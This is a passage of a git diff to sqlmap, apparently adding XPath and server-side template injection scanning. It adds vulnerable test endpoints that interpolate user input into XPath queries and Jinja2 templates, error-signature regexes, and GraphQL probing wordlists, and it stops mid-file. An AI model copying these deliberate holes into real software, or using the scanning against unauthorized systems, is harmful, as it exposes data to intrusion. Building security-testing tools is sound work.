diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 7f3268e69a..367bec2140 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -93,6 +93,14 @@ jobs:
- name: Basic import test
run: python -c "import sqlmap; import sqlmapapi"
+ - name: Install optional test deps (lxml, jinja2)
+ # lxml has no PyPy-2.7 wheel and 5.x is Py3-only, so it cannot be pip-installed there. The
+ # tests that use it (test_xpath's real-XPath checks, and the --xpath/--ssti vuln-test
+ # endpoints) skip themselves when the engine is unavailable, so these deps are only needed
+ # on the Py3 jobs.
+ if: matrix.python-version != 'pypy-2.7'
+ run: python -m pip install -q lxml jinja2
+
- name: Unit tests
# -B: do not write .pyc files. On Python 2 / PyPy a cached .pyc makes a module's __file__
# point at the .pyc, which would make the later --smoke getFileType(__file__) doctest see
diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
index f8337e8c87..f5165aed77 100644
--- a/data/txt/sha256sums.txt
+++ b/data/txt/sha256sums.txt
@@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
-32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py
+617cec1b731e0baacafa6f58c2f56a85b6128d1416627cc1b2f61519c8539a2e extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
-c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py
-256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py
+9137a8f7368496c84b21944f6b94c28004d3a2a849ac9c8e0b20e294e4c4a93a lib/controller/checks.py
+4598de22ed3df63432e9643ba48533a01bec9f0b253c3a11f322ccedaef353f0 lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
-1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py
+33ed53b263fa766a808be6797dd812822bb115d3b9db6e3a34763f500f5359e8 lib/core/optiondict.py
e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py
21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
-e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py
+0a99ba2412606979d02c25ab63d0d92bfe3f2a262d6405a740841f5df83970ba lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
-46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py
+073cc21334519624288bbf25060ab4e8102cbe6ec15e706992e639716075af8d lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
-8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py
+316cdcb3d8d839dab639ed7eb4935780375d49c93371edbd6224976cbb968c2e lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@@ -240,15 +240,19 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/graphql/__init__.py
-ffbc7583a563bb9fe5a560ca8363f3e4ec84ecf907b956883ab1f2904f19d529 lib/techniques/graphql/inject.py
+c3e5cf7e5e35ae5fd86b63a515b37e6f06e61c70d2690252f2ee8373aa16637e lib/techniques/graphql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ldap/__init__.py
-cc90c641d74244e45fa0c8c4026315452137e66b6fb5cef681d0eacd4e11eb69 lib/techniques/ldap/inject.py
+039d64a610b0e92e953fa6eaa740e7c2867e34e12b82e0113204e8f6100dc368 lib/techniques/ldap/inject.py
44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
-e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques/nosql/inject.py
+e465d9cb6ac83dafe38aeec851856183b93f5aa19f628fb64371a290797e2518 lib/techniques/nosql/inject.py
+1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ssti/__init__.py
+29ab841b6129106f19db692a5a30f90a5e758d6cd24d47da0a35c8090910ae18 lib/techniques/ssti/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
+1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py
+c61816c9dba9f6cc2223aed1a923f95130979e5f0a88ec254ee667d955ed2734 lib/techniques/xpath/inject.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
@@ -584,7 +588,7 @@ d16977d057c28888aa41500f79a19789cadef693cb8b7d9a3bca55b983ce2266 tests/test_age
feb763ddcbf4f32822372ca53f8c71c754af7b72510ef06e1e9c77927fc90b10 tests/test_bigarray.py
36bcb68483d824db5d05870fab62f1907221bf256826b734302fbc15a9231c42 tests/test_brute.py
27ad87c0ea377e0657bd6f6a4eaa0e9756aa9d28ec0483bdadeb3f66dcc4660d tests/test_charset.py
-c99b77cc5d85334f147a1a6d4b2867af396f70e9f2609f8587344e084910e893 tests/test_checks.py
+7596fc69678304923b5c945c0fd9b8ee62a2dfc7fb14ccb6dc7af30893dc8012 tests/test_checks.py
9e678a56e16211c49ab4995b6c658d3f122bfa3b357d9e17ff38f5a489ace6ad tests/test_cloak.py
2ec894f49ca9bd750a23ead16dae176bcbc57d18ec5847fa4a5eeb886d75c1bd tests/test_common_helpers.py
cdacb37cbe5667fded00abe62a822e11c917e9cb5c3f664b7aa1a8d738412ed4 tests/test_common.py
@@ -611,10 +615,10 @@ bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_err
26730151abea598f193131c5d64ef92b531941972f3d6236f9951c3116030b1c tests/test_filesystem.py
16fba97cba6afe8af11aa30bcc4266f53b00f2530161e010af10b51db1509703 tests/test_fingerprint.py
20844dfc758e99b2f757906c51ef32aca0f699283ec5aa629158d3dc0fd279ea tests/test_generic_takeover.py
-bde97a4781c4ee84e0fe86f7a33206f114167eb14b704013ecf1c26b838193d7 tests/test_graphql.py
+f1f38f8b8ca667caadcb027d1a20eb895be4ef0935511114db235e66903bb463 tests/test_graphql.py
50b71422ee91b9a4864f4d5ce6c9bdf169dc5f57ed1db05c152eb010c282136b tests/test_gui_helpers.py
92648f2fe81e22c5726b198bbbda14961cd4d3294a0d9139dcea808b324142ac tests/test_har.py
-70919c6ee8fbb3d619873489c819fa37d9035beb2e9b658cc5aa531d86a40380 tests/test_hash_crack.py
+cc7677bc6c568c395112c1aa7d01e1d664e4d5940c86cb4d44987172864bae6f tests/test_hash_crack.py
0336c875dd2b6554bff6eafd746229e38c69ca8070cd933d45cf27c82ef3e05f tests/test_hashdb.py
c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_hash.py
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
@@ -639,6 +643,7 @@ cec98d72992c0799229a780fa7f0d7f3fb01ec2d708187ce0e4a05c8612f291b tests/test_saf
a1c6cda1e5b483f61e6a4f8ddd0b06a15ddaa3fd2119bfb9dbd9cc970d7a751d tests/test_settings_regex.py
29d0278e3718b0fee422d3f6bb85ca02560138d48cd76f9fe1f35ac19d96071b tests/test_sgmllib.py
d3d991331096e16e5019de3d652e9fff92c09bd9f97c50b1c2c3ceb0ed49b17e tests/test_sqlparse.py
+4a9409a070770cc6300ed2b0c954254273479252fa602ffd19d78917f895756c tests/test_ssti.py
8bcbf1091134dd0a62f6201f8b3645ed87b5ff2f7ba40a87231a29dac412591f tests/test_strings.py
8f1c5f0f337ecd26d35c5551060034e0aa33a62cce5385fc1227fdc485f6383e tests/test_tamper.py
67472bd71c20782cc0f738e2c2e674c29d6985669e14d15b69baef7d0e33de62 tests/test_target_parsing.py
@@ -650,10 +655,11 @@ f49bcce1df533ffa1acfd02af43faf6687b21eebda9362ceb1e5871b8cb37fd4 tests/test_thr
48b0ae4abe0fdde8ce4975c5cbf4c3514a2815021cb2e3a490a189bea5edfe78 tests/test_unpickle_security.py
4b646f513c6da1e33200184ed6eabe0aa345eb2e2a19598dc123e191168591bf tests/test_urls.py
eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_users_enum.py
-23ffd75b5aec33066e6d6aad01ab2c9c1b12ee20c1a0990f8f1be81f1ad16161 tests/_testutils.py
+045f05f958100adc883b3f56613c5f8002dd19d0752225397a1f771775cb2779 tests/_testutils.py
2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py
93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py
81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py
+2698060e7f001e054e345512ce95be458d9902b913afa769398b53145475738a tests/test_xpath.py
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 99189fbab7..f20c318ebc 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -217,6 +217,84 @@ def nosql_match(params):
else: # $eq, $in (single-valued here) and any literal equality
return record == value
+# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------
+
+XPATH_XML = """
+
+
+
+ luther
+ Luther Blisset
+ luther@example.com
+ db3a16990a0008a3b04707fdef6584a0
+ System Administrator
+ London
+ +1 555 0100
+
+
+ fluffy
+ Fluffy Bunny
+ fluffy@example.com
+ 4db967ce67b15e7fb84c266a76684729
+ Security Engineer
+ Amsterdam
+ +1 555 0102
+
+
+ wu
+ Wu Ming
+ wu@example.com
+ f5a2950eaa10f9e99896800eacbe8275
+ Network Administrator
+ Shanghai
+ +86 21 555 0103
+
+
+
+
+ linus
+ Linus Torvalds
+ linus@example.com
+ 8e7b6a5c4d321908f7e6d5c4b3a2910f
+ Kernel Developer
+ Portland
+ +1 555 0200
+
+
+ ada
+ Ada Lovelace
+ ada@example.com
+ 1a2b3c4d5e6f7081920a1b2c3d4e5f60
+ Algorithm Designer
+ London
+ +44 20 555 0201
+
+
+
+
+ grace
+ Grace Hopper
+ grace@example.com
+ 9e8d7c6b5a493827160e9d8c7b6a5948
+ CTO
+ New York
+ +1 555 0300
+
+
+"""
+
+def _xpath_element_to_dict(el):
+ """Convert an lxml element to a dict for JSON serialization."""
+ retVal = dict(el.attrib)
+ retVal["tag"] = el.tag
+ retVal["text"] = (el.text or "").strip()
+ children = []
+ for child in el:
+ children.append(_xpath_element_to_dict(child))
+ if children:
+ retVal["children"] = children
+ return retVal
+
_conn = None
_cursor = None
_lock = None
@@ -889,6 +967,83 @@ def do_REQUEST(self):
self.wfile.write(output.encode(UNICODE_ENCODING))
return
+ if self.url == "/xpath/search":
+ self.send_response(OK)
+ self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ q = self.params.get("q", "")
+ entries = []
+ error = None
+
+ if q:
+ try:
+ from lxml import etree
+ root = etree.fromstring(XPATH_XML.encode("utf-8"))
+ # VULNERABLE: unsanitized user input directly interpolated into XPath
+ xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q)
+ elements = root.xpath(xpath_expr)
+ entries = [_xpath_element_to_dict(el) for el in elements]
+ except Exception as ex:
+ error = "%s: %s" % (type(ex).__name__, str(ex))
+
+ output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str)
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
+ if self.url == "/xpath/login":
+ self.send_response(OK)
+ self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ username = self.params.get("username", "")
+ password = self.params.get("password", "")
+ error = None
+ authenticated = False
+
+ if username and password:
+ try:
+ from lxml import etree
+ root = etree.fromstring(XPATH_XML.encode("utf-8"))
+ # VULNERABLE: unsanitized interpolation into XPath login expression
+ xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password)
+ results = root.xpath(xpath_expr)
+ if results:
+ authenticated = True
+ except Exception as ex:
+ error = "%s: %s" % (type(ex).__name__, str(ex))
+
+ output = json.dumps({"authenticated": authenticated, "error": error}, default=str)
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
+ if self.url == "/ssti/search":
+ self.send_response(OK)
+ self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ q = self.params.get("q", "")
+ output = "
"
+
+ if q:
+ try:
+ from jinja2 import Template
+ # VULNERABLE: unsanitized user input passed to Jinja2 template engine
+ template = Template("Hello " + q)
+ output += template.render()
+ except Exception as ex:
+ # Leak template engine error for error-based detection
+ output += "%s: %s" % (type(ex).__name__, str(ex))
+ else:
+ output += "Hello"
+
+ output += ""
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index f51d42000b..4589599de4 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -83,6 +83,8 @@
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import LDAP_ERROR_REGEX
+from lib.core.settings import SSTI_ERROR_REGEX
+from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
from lib.core.settings import IPS_WAF_CHECK_RATIO
from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
@@ -1194,6 +1196,20 @@ def _(page):
if conf.beep:
beep()
+ if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
+ if not conf.ssti and re.search(SSTI_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (SSTI) test shows that %sparameter '%s' might be vulnerable to server-side template injection (rerun with switch '--ssti')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
kb.disableHtmlDecoding = False
kb.heuristicMode = False
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 2294a66c1a..0ce4960a20 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -543,6 +543,16 @@ def start():
ldapScan()
continue
+ if conf.xpath:
+ from lib.techniques.xpath.inject import xpathScan
+ xpathScan()
+ continue
+
+ if conf.ssti:
+ from lib.techniques.ssti.inject import sstiScan
+ sstiScan()
+ continue
+
if conf.nullConnection:
checkNullConnection()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 42c187c89b..69d76f7044 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -120,6 +120,9 @@
"technique": "string",
"nosql": "boolean",
"graphql": "boolean",
+ "ldap": "boolean",
+ "xpath": "boolean",
+ "ssti": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
@@ -170,6 +173,8 @@
"lastChar": "integer",
"sqlQuery": "string",
"sqlShell": "boolean",
+ "sstiQuery": "string",
+ "sstiShell": "boolean",
"sqlFile": "string",
},
diff --git a/lib/core/settings.py b/lib/core/settings.py
index f2d89666b0..413ffb4cfa 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@
from thirdparty import six
# sqlmap version (...)
-VERSION = "1.10.6.188"
+VERSION = "1.10.6.194"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -878,7 +878,15 @@
NOSQL_MAX_LENGTH = 1024
# GraphQL endpoint paths to probe when the user supplies a base URL with --graphql (no explicit /graphql)
-GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/graphql/api", "/graph", "/gql")
+GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/api/v1/graphql", "/graphql/api", "/graphql/console", "/graphql.php", "/graphiql", "/graph", "/gql", "/query")
+
+# Seed field/argument names used to recover a GraphQL schema from "Did you mean" suggestion error
+# messages when introspection is disabled (the field-suggestion / "Clairvoyance" technique)
+GRAPHQL_FIELD_WORDLIST = ("user", "users", "me", "search", "login", "node", "post", "posts",
+ "account", "accounts", "profile", "product", "products", "order", "orders", "item", "items",
+ "customer", "find", "get", "list", "comment", "comments", "message", "messages", "updateUser")
+GRAPHQL_ARG_WORDLIST = ("id", "username", "user", "name", "term", "query", "q", "search",
+ "email", "input", "password", "key", "filter", "slug", "title", "uid")
# Canonical GraphQL introspection query (the one everyone copy-pastes). Returned schema carries the
# full type system: query/mutation/subscription roots, OBJECT/INPUT_OBJECT/ENUM/SCALAR types, their
@@ -967,6 +975,9 @@
# Upper bound for the value-length search during LDAP blind extraction
LDAP_MAX_LENGTH = 256
+# Maximum number of directory entries enumerated during LDAP blind dumping
+LDAP_MAX_RECORDS = 20
+
# Attributes that definitively identify the backend vendor when probed on the RootDSE or
# a well-known directory entry. Each tuple is (attribute, expected_value_substring, backend).
LDAP_FINGERPRINT_ATTRIBUTES = (
@@ -977,6 +988,63 @@
("vendorName", "Red Hat", "389 Directory Server"),
)
+# XPath error signatures per parser implementation for error-based detection and
+# fingerprinting (matched against HTTP response bodies). Each tuple is
+# (backend_name, regex_fragment).
+XPATH_ERROR_SIGNATURES = (
+ ("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"),
+ ("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"),
+ ("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"),
+ ("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"),
+ (".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"),
+ (".NET XPathNavigator", r"Expression must evaluate to a node-set"),
+ (".NET XPathNavigator", r"has an invalid (?:token|qualified name)"),
+ ("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"),
+ ("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"),
+ ("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"),
+ ("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"),
+ ("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"),
+ ("Saxon (standalone)", r"Static error\(s\) in query"),
+ ("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"),
+ ("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"),
+ ("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"),
+ ("eXist", r"exerr:ERROR"),
+ ("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"),
+ ("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"),
+ ("Generic XPath", r"Invalid XPath|XPath evaluation failed"),
+)
+
+XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES)
+
+# Printable-ASCII codepoint bounds bisected during XPath blind character extraction
+XPATH_CHAR_MIN = 0x20
+XPATH_CHAR_MAX = 0x7e
+
+# Maximum tree depth for recursive XML walking during XPath blind extraction
+XPATH_MAX_DEPTH = 32
+
+# Upper bound for the value-length search during XPath blind extraction
+XPATH_MAX_LENGTH = 256
+
+# SSTI error signatures per template engine for detection and fingerprinting.
+# Each tuple is (engine_name, regex_fragment).
+SSTI_ERROR_SIGNATURES = (
+ ("Jinja2", r"jinja2\.exceptions\.\w+|TemplateSyntaxError|UndefinedError|TemplateNotFound|TemplateAssertionError"),
+ ("Twig", r"Twig[\\_]Error|Twig[\\_]Environment|Unknown (?:filter|function|test|tag)"),
+ ("Freemarker", r"freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException"),
+ ("Velocity", r"org\.apache\.velocity\.(?:runtime|exception)\.\w+|ParseErrorException|MethodInvocationException|ResourceNotFoundException"),
+ ("Spring EL / Thymeleaf", r"org\.springframework\.expression\.\w+|org\.thymeleaf\.\w+|SpelEvaluationException|TemplateProcessingException|ExpressionParsingException"),
+ ("ERB", r"\(erb\):\d+|NameError.*undefined local variable"),
+ ("Pug/Jade", r"pug|jade|ParseError"),
+ ("Handlebars", r"handlebars|Handlebars|Parse error on line"),
+ ("Generic SSTI", r"template.*?(?:error|syntax|exception)"),
+)
+
+SSTI_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in SSTI_ERROR_SIGNATURES)
+
+# Upper bound for SSTI value extraction (reserved for future use)
+SSTI_MAX_LENGTH = 256
+
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
diff --git a/lib/core/testing.py b/lib/core/testing.py
index 158a218e30..ba7d48139e 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -91,6 +91,8 @@ def vulnTest():
("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed)
("-u \"ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing
+ ("-u \"xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction
+ ("-u \"ssti/search?q=x\" --ssti --flush-session --disable-hashing", ("is vulnerable to SSTI", "Title: SSTI Jinja2 injection", "back-end template engine: 'Jinja2'", "in-band arithmetic proof confirmed", "SSTI scan complete")), # SSTI: Jinja2 detection via arithmetic control-pair + boolean oracle + distinguishing probe
("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),
@@ -98,6 +100,20 @@ def vulnTest():
("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
)
+ # The vulnserver's XPath endpoint renders with lxml and its SSTI endpoint with jinja2; where those
+ # optional third-party engines are not importable (e.g. PyPy 2.7, which has no lxml wheel), skip
+ # just those entries instead of failing the whole run - the rest of the suite is unaffected.
+ try:
+ __import__("lxml")
+ except ImportError:
+ TESTS = tuple(_ for _ in TESTS if "--xpath" not in _[0])
+ logger.warning("skipping the XPath vuln-test entry ('lxml' not available)")
+ try:
+ __import__("jinja2")
+ except ImportError:
+ TESTS = tuple(_ for _ in TESTS if "--ssti" not in _[0])
+ logger.warning("skipping the SSTI vuln-test entry ('jinja2' not available)")
+
retVal = True
count = 0
cleanups = []
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 72e43e1e65..3a134484c7 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -415,15 +415,6 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
- techniques.add_argument("--nosql", dest="nosql", action="store_true",
- help="Test for NoSQL injection (e.g. MongoDB, CouchDB, Neo4j)")
-
- techniques.add_argument("--graphql", dest="graphql", action="store_true",
